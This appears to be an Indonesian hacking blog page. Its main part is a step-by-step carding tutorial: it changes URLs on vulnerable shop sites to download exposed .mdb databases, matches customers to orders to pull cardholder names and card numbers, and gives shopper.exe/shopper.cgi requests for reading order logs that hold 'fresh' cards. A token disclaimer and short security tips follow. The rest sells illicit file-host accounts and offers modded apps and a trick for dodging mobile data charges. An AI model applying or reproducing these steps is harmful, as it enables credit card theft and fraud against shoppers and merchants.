Selanjutnya Google akan menampilkan target-target empuk yang mempunyai celah keamanan yang belum sempurna. Silakan Anda buka saja. Misalnya:
http://www.situs-target.com/ashopKart20/addprod.asp
Pertama-tama hilangkan tanda string: ashopKart20 dan seterusnya. Kemudian tambahkan string:
admin/scart.mdb
Jadinya:
http://www.situs-target.com/admin/scart.mdb
Secara otomatis akan muncul pesan apakah Anda akan mendownload file database.
Anda bisa mendownload file database langsung ataupun menggunakan program pihak ketiga, misalnya internet download manager yang softwarenya banyak ditemui di internet dan bisa didownload lalu diinstal di komputer Anda.
Dalam database tersebut, nomor kartu kredit berada pada bagian orders. Sedangkan informasi pembeli berada pada bagian Customers. Sehingga nama pemilik kartu kredit bisa diketahui dari tabel customers lalu dicocokkan id-nya dengan orders.
Miscellaneous Database
Berikut ini adalah teknik untuk mendapatkan file database, yang boleh dibilang nama databasenya acak. Jadi miscellaneous bukan berarti itu adalah nama sebuah database. Sebenarnya hampir sama saja cara dan tekniknya dengan beberapa yang ada yang tadi sudah dibahas. Nama database itu bisa apa saja, misalnya toko.mdb, jual.mdb.
Akan saya suguhkan sebuah contoh kasus.
Syntax: /shop/category.asp/catid
Misalnya, Anda menemukan target dengan url:
http://www.situs-target.com/shop/category.asp?catid=37
Hapuslah shop/category.asp?catid=37 (angkanya bisa berapapun, tergantung situs target yang Anda peroleh). Kemudian ganti menjadi:
/admin/dbsetup.asp
Maka nama situsnya menjadi:
http://www.situs-target.com//admin/dbsetup.asp
Perhatikan dengan baik dan benar, garis miring (/) yang digunakan sebelum admin ada dua buah (//admin). Jadi itu bukan karena salah ketik!
Berikut adalah tampilan dua buah target yang saya temukan. Sengaja pada bagian ini saya memberikan contoh dua buah target untuk menampilkan mana file databasenya.
Misalnya dari contoh target yang pertama, nama file databasenya adalah icommerce.mdb. Sedangkan nama file database untuk situs target kedua adalah worldofwater.mdb.
Urusan download database-nya sekarang saya serahkan pada Anda supaya logika dan pikiran Anda bisa berkembang. Lagipula nama databasenya sudah ketahuan kok.
SHOPPER EXE EXPLOIT
Berikut ini syntax yang bisa dicoba:
http://www.situs-target.com/cgi-bin/shopper.exe?search=action&keywords=Dy4-VoN%2520&template=order.log
atau
http://www.situs-target.com/cgi-bin/shopper.cgi?search=action&keywords=Dy4-VoN%20&template=order.log
looding sebentar.......
Wah ternyata, banyak juga log file hasil shopping yang ditemukan....
Setelah penulis cek dan lihat hasil log file nya banyak juga cc yang masih fresh tapi tidak ada no cvv nya, hanya no pemegang kartu dan no cc dan cardExpire.
Sekali lagi, ini hanya ilmu pengetahuan dan sangat tidak disarankan untuk menyalahgunakannya.
Jika anda sebagai web master dari shopping online, tentunya anda harus lebih berhati-hati dengan teknik ini.
SECURITY TIPS (TIPS UNTUK KEAMANAN JARINGAN WEBSITE ANDA)
Khusus untuk Anda yang mengelola sebuah situs online shopping, usahakanlah untuk membuat file database yang tidak bisa diakses melalui directory public. Hindari meletakkan file database pada webroot. (Tahu kan apa yang dimaksud dengan webroot? kalau nggak tahu banyaklah membaca buku-buku tentang jaringan internet, atau bisa juga membaca-baca di wikipedia.com)
Buatlah permission untuk mengakses database pada sebuah direktori khusus, hal ini akan mencegah orang lain mendownload file database. Jangan gunakan nama database default. Ubahlah menjadi nama lainnya yang Anda rasa aman. Untuk para user, berhati-hatilah untuk berbelanja pada situs online. Carilah informasi mengenai sistem keamanan situs tersebut. Dan pastikan bahwa halaman belanja yang Anda buka bukanlah scam page, juga bukan phising.
pengen Rapidshare ato megaupload account?
saya bisa menjualnya untuk anda
1-2 bulan 40 ribu
3-4 80 ribu
4-6 100 ribu
1 tahun 150 ribu
(Unguarantee)
1.5 bulan 50 ribu
3.5 bulan 100 ribu
6 bulan 180 ribu
(guarantee)
teknik mendapatkan accountnya 250 ribu
untuk lebih lanjut silakan hub
missblacklist@yahoo.com
mblacklist@yahoo.com
dari pada susah2 nyari file di google, mending pake tool ini
dijamin langsung dapet download link dibawah
Google Hacker
ada yang mau g antivirus ini?
silakan download di link yang ada di paling bawah
menurutq sih tambah baek cuma yang tetep bikin jelek tuh lemot waktu awal
dibawah ini ada screennya yang berubah
untuk mendownloadnyaklik link di bawah ini
download
dibawah ini smuawnya app gratis
silakan klik untuk download
teashark :pengganti opera buat xl(gratis)
kumpulan opera modif
opera 1
opera axis
opera 2
selamat mencoba
buat asrul nih monggo di unduh
Nih da koleksi software bagi yang suka ngemigg
migg33 ini dibuat biar bisa multi ID gtu!!!
Silakan download di bawah ini
migg 1
migg 2
migg 3
migg 4
migg 5
migg 6
migg 7
migg 8
migg 9
migg 10
cara pakainya gampang!!
minimize za klo mau gunain ID ke dua
truz minimize lagi klo mau gunain yang ke tiga
begitu juga dan seterussnya.............................!!!
akhir akhir nih q sering dengar banyak virus yang merajalela lewat hp.
cba pake ini
anti virus ini mungkin cukup bermanfaat buat kamu terutama
yang hpnya symbian. cukup klik dibawah ini
kaspersky truz update nya di sini cukup copas file b.dat di C/E:system/apps/KSMobile truz tindih deh file lama
ni juga hasil binpda silakan download simwork
mungkin tempo hari saya udah pernah tunjukin software bwt internet gratis lewat hp tpi kyknya gratisnya udah habis so disini q kan cba ngobati hati temen- temen lewat cara download gratis(bkan internetnya) .di bawah ini ada beberapa langkah bwt download file gratis lewat hp Jadi misal alamat URL nya : http://esc-creation.com/info/opera-mini-modif.jar edit URL nya dan tambahkan query sehingga menjadi http://202.87.46.133@esc-creation.com/info/opera-mini-modif.jar
mw tw??
begini langkahnya
dibawah ini ada beberapa situs yang nyediain sms gratis buat kita
tapi jangan kecewa klo ada yang harus register dulu tapi masih hemat koq n g mahal- mahal amat
silakan copas ke link anda masing masing
lokal
www.lippostar.com bisa ngirim ke operator mana saja.Gratis!!
www.1rstwap.comsebelum kirim sms, harus download program kecil dulu
www.astaga.com harus register sebelum kirim sms
www.smsok.com bisa kirim sms lintas operator. Untuk penggunaannya menggunakan sistem kredit/ token. Gratis 20 token setiap daftar
www.duniamobile.combisa kirim sms lintas operator. Untuk penggunaannya menggunakan sistem kredit/ token. Token dapat di beli di sejumlah warnet dengan harga terjangkau
Luar Negeri
www.smsdriver.com tuk menggunakan sms harus daftar dulu
www.smsac.com sama harus daftar dulu
www.quios.com harus sign up dulu!!
www.mtnsms.com boleh juga nih
www.winbox.com selain kirim pesan, bisa kirim logo, dan ringing tones, ada email gratisnya yg dilengkapi email alert via sms. yg asik dikirimi horoscope, words, joke tiap hari (kalo minta)
www.unimobiles.combisa kirim sms keseluruh dunia. Selain itu, bisa juga kirim pesan ke pager dan berbagai aplikasi mobile lainnya. Ada fasilitas e-mailnya juga lo....
www.breathe.com bisa kirim sms keseluruh dunia. Ada juga fasilitas é-mailnya
www.yourmobile.com selain sms, ada juga ringtones dan logo